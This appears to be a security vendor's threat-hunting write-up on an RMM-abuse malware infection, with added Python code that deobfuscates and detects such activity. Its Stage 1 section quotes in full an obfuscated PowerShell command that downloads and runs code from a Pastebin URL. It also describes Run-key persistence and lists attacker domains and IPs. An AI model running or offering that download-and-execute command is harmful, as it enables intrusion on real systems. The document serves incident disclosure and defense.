At RSM Defense, we embrace a proactive approach to cybersecurity. Instead of waiting for alerts to trigger a response, our Threat Hunting team regularly conducts hypothesis-driven investigations. These investigations are designed to uncover subtle threats hiding within behavior that might seem legitimate.
In late May 2025, our proactive approach paid off when we uncovered an active malware infection stemming from the abuse of Remote Monitoring and Management (RMM) tools.
The Hypothesis: RMM as a Vector
Remote Monitoring and Management tools are widely used by IT and support teams. Unfortunately, their ubiquity also makes them attractive targets for threat actors seeking stealthy initial access or execution. Our recurring hypothesis was:
“If RMM software is being misused, we may observe it operating from suspicious directories.”
During our hunt on May 30, that’s exactly what we found.
Stage 1: Obfuscated PowerShell and Pastebin
We detected a heavily obfuscated PowerShell command that had been executed. It looked like this:
powershell -NoP -w 1 -c "$b = 'iwr'; $w = & $b -UseBasicParsing('h' +'t' +'t' + 'p' + 's://past' + 'ebi' + 'n.com' + '/ra' + 'w/wftk656V'); $a = 'iex'; & $a $w"
This script:
- Constructed its URL from concatenated string fragments and hid the cmdlet names (iwr, iex) in variables to evade simple signature matching
- Pulled down a second-stage PowerShell payload from hxxps://Pastebin[.]com/raw/wftk656V
- Executed that remote code directly using Invoke-Expression
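The command above is only opaque to a signature that looks for a literal URL or cmdlet name. Folding the concatenated fragments back together and resolving the variables that are invoked with & recovers both. The following Python is an added example written for this post, not RSM Defense's own hunt tooling; the sample command line is constructed to match the shape of the one quoted above, and the indicator names and the RISKY_COMMANDS list are assumptions you would tune to your own telemetry.

```python
import re
from typing import Dict, List

# Constructed sample, modelled on the obfuscated command quoted in the post.
SAMPLE_CMD = (
    "powershell -NoP -w 1 -c \"$b = 'iwr'; $w = & $b -UseBasicParsing("
    "'h' +'t' +'t' + 'p' + 's://past' + 'ebi' + 'n.com' + '/ra' + 'w/wftk656V'); "
    "$a = 'iex'; & $a $w\""
)

# A run of two or more single-quoted literals joined with '+'.
LITERAL_CHAIN = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
SINGLE_LITERAL = re.compile(r"'([^']*)'")
VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")   # $b = 'iwr'
VAR_INVOKE = re.compile(r"&\s*\$(\w+)")               # & $b
URL_RE = re.compile(r"https?://\S+")
# Assumed watch-list of download/execute cmdlets and their aliases.
RISKY_COMMANDS = {"iwr", "invoke-webrequest", "iex", "invoke-expression", "curl", "wget"}


def fold_concatenations(cmd: str) -> str:
    """Replace every 'a' + 'b' + 'c' chain with the single joined literal."""
    def join(match: "re.Match[str]") -> str:
        return "'" + "".join(SINGLE_LITERAL.findall(match.group(0))) + "'"
    return LITERAL_CHAIN.sub(join, cmd)


def resolve_invocations(cmd: str) -> List[str]:
    """Map each `& $var` call back to the literal assigned to $var."""
    assigned = {name.lower(): value.lower() for name, value in VAR_ASSIGN.findall(cmd)}
    return [assigned[n.lower()] for n in VAR_INVOKE.findall(cmd) if n.lower() in assigned]


def analyze(cmd: str) -> Dict[str, object]:
    """Deobfuscate a PowerShell command line and list the hunt indicators it trips."""
    folded = fold_concatenations(cmd)
    urls = [u.rstrip("');\"") for u in URL_RE.findall(folded)]
    invoked = resolve_invocations(folded)
    indicators: List[str] = []
    if LITERAL_CHAIN.search(cmd):
        indicators.append("string-concatenation obfuscation")
    if re.search(r"-NoP\b", cmd, re.I):
        indicators.append("-NoProfile")
    if re.search(r"-w\s+1\b|-WindowStyle\s+Hidden", cmd, re.I):
        indicators.append("hidden window")
    risky = [c for c in invoked if c in RISKY_COMMANDS]
    if risky:
        indicators.append("cmdlet alias invoked via variable: " + ", ".join(risky))
    if any("pastebin.com/raw" in u.lower() for u in urls):
        indicators.append("pastebin raw download")
    return {"deobfuscated": folded, "urls": urls, "invoked": invoked, "indicators": indicators}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMD)
    print(result["deobfuscated"])
    for line in result["indicators"]:
        print("  -", line)
```

Run over process-creation events, the deobfuscated field is what you would pivot on (the raw paste URL and the iwr/iex pair), while a benign `powershell -c Get-Process` produces no indicators at all.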
Stage 2: Payload Delivery and Persistence
The hosted Pastebin script downloaded a ZIP archive from a known malicious domain:
- hxxp://nasotomasyon[.]com/kopal[.]zip
It then:
- Extracted and dropped a file named client32.exe into a randomized subfolder of ProgramData
- Established persistence by adding a value named MySoft under the Run key HKCU:\Software\Microsoft\Windows\CurrentVersion\Run, pointing to the path of the malicious executable
These actions were confirmed in SentinelOne’s Singularity Data Lake, including:
- Outbound connections to both the Pastebin and malicious ZIP URLs
- Creation of the Registry key
- File writes related to the extracted executable
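The hunt hypothesis (RMM binaries running from unexpected directories) and the Stage 2 persistence both reduce to a few path checks over process and registry telemetry, plus a correlation between the two. The block below is an added example written for this post, not RSM Defense's detection content or a SentinelOne query; the events are constructed, the staging-directory patterns and the RMM_BINARIES watch-list are assumptions, and client32.exe is included only because it is the binary named above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Assumed "staging" locations where a remote-access client has no business running.
STAGING_DIRS = [
    re.compile(r"^[a-z]:\\programdata\\"),
    re.compile(r"^[a-z]:\\windows\\temp\\"),
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\"),
]
PROGRAM_FILES = re.compile(r"^[a-z]:\\program files( \(x86\))?\\")
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run$")
# Assumed watch-list of RMM / remote-control client binary names.
RMM_BINARIES = {"client32.exe"}


@dataclass
class Event:
    kind: str          # "process" (image path) or "registry" (key path + value)
    host: str
    path: str
    value_name: str = ""
    data: str = ""     # registry value data, e.g. the executable the Run entry launches


# Constructed telemetry: one vendor-installed client, one staged copy with a Run entry,
# and a legitimate per-user Run entry that must not fire.
SAMPLE_EVENTS = [
    Event("process", "WS-01", r"C:\Program Files\Vendor\client32.exe"),
    Event("process", "WS-02", r"C:\ProgramData\kx7q2m9z\client32.exe"),
    Event("registry", "WS-02", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
          "MySoft", r"C:\ProgramData\kx7q2m9z\client32.exe"),
    Event("registry", "WS-03", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
          "OneDrive", r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
]


def norm(path: str) -> str:
    """Lower-case, strip quotes and unify separators so paths compare reliably."""
    return path.strip().strip('"').replace("/", "\\").lower()


def in_staging_dir(path: str) -> bool:
    p = norm(path)
    return any(rx.match(p) for rx in STAGING_DIRS)


def hunt(events: List[Event]) -> List[Dict[str, str]]:
    """Return one finding per rule hit; a staged RMM client with persistence hits several."""
    findings: List[Dict[str, str]] = []
    running = {(e.host, norm(e.path)) for e in events if e.kind == "process"}
    for e in events:
        if e.kind == "process":
            p = norm(e.path)
            name = p.rsplit("\\", 1)[-1]
            if name in RMM_BINARIES and not PROGRAM_FILES.match(p):
                findings.append({"host": e.host, "rule": "rmm-binary-outside-program-files", "path": e.path})
            if in_staging_dir(p):
                findings.append({"host": e.host, "rule": "exe-launched-from-staging-dir", "path": e.path})
        elif e.kind == "registry" and RUN_KEY.search(norm(e.path)):
            target = norm(e.data)
            if in_staging_dir(target):
                findings.append({"host": e.host, "rule": "run-key-points-to-staging-dir",
                                 "path": e.data, "value": e.value_name})
            # Correlate persistence with execution: the Run target is already a live process.
            if (e.host, target) in running:
                findings.append({"host": e.host, "rule": "run-key-target-is-running",
                                 "path": e.data, "value": e.value_name})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

Only WS-02 produces findings: the vendor install on WS-01 sits under Program Files and the OneDrive entry on WS-03 points outside the staging directories, which is the kind of noise a hypothesis like this has to tolerate before it is worth running on a schedule.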
Containment and Investigation
Once identified, the endpoint was immediately isolated from the network. Investigation confirmed that:
- client32.exe was actively beaconing to 176[.]65[.]142[.]78
- There was no evidence of lateral movement, privilege escalation, or data exfiltration.
This swift containment, paired with high-confidence verification, prevented the threat from escalating further.
Key Takeaways
- Recurring hunts produce real results. This malware was caught by an intentional, proactive hunt.
- Public services like Pastebin continue to be abused by attackers. Script delivery via public URLs remains a low-effort, high-success tactic.
- RMM tooling remains a high-value attack surface. Its ubiquity and system-level access make it an ideal target for adversaries.
Conclusion
This incident is a textbook example of why threat hunting matters. By thinking like an attacker and routinely testing hypotheses, our team caught a threat before it could become a breach. Prevention is great. However, visibility, curiosity, and human-led detection are what make defense truly proactive.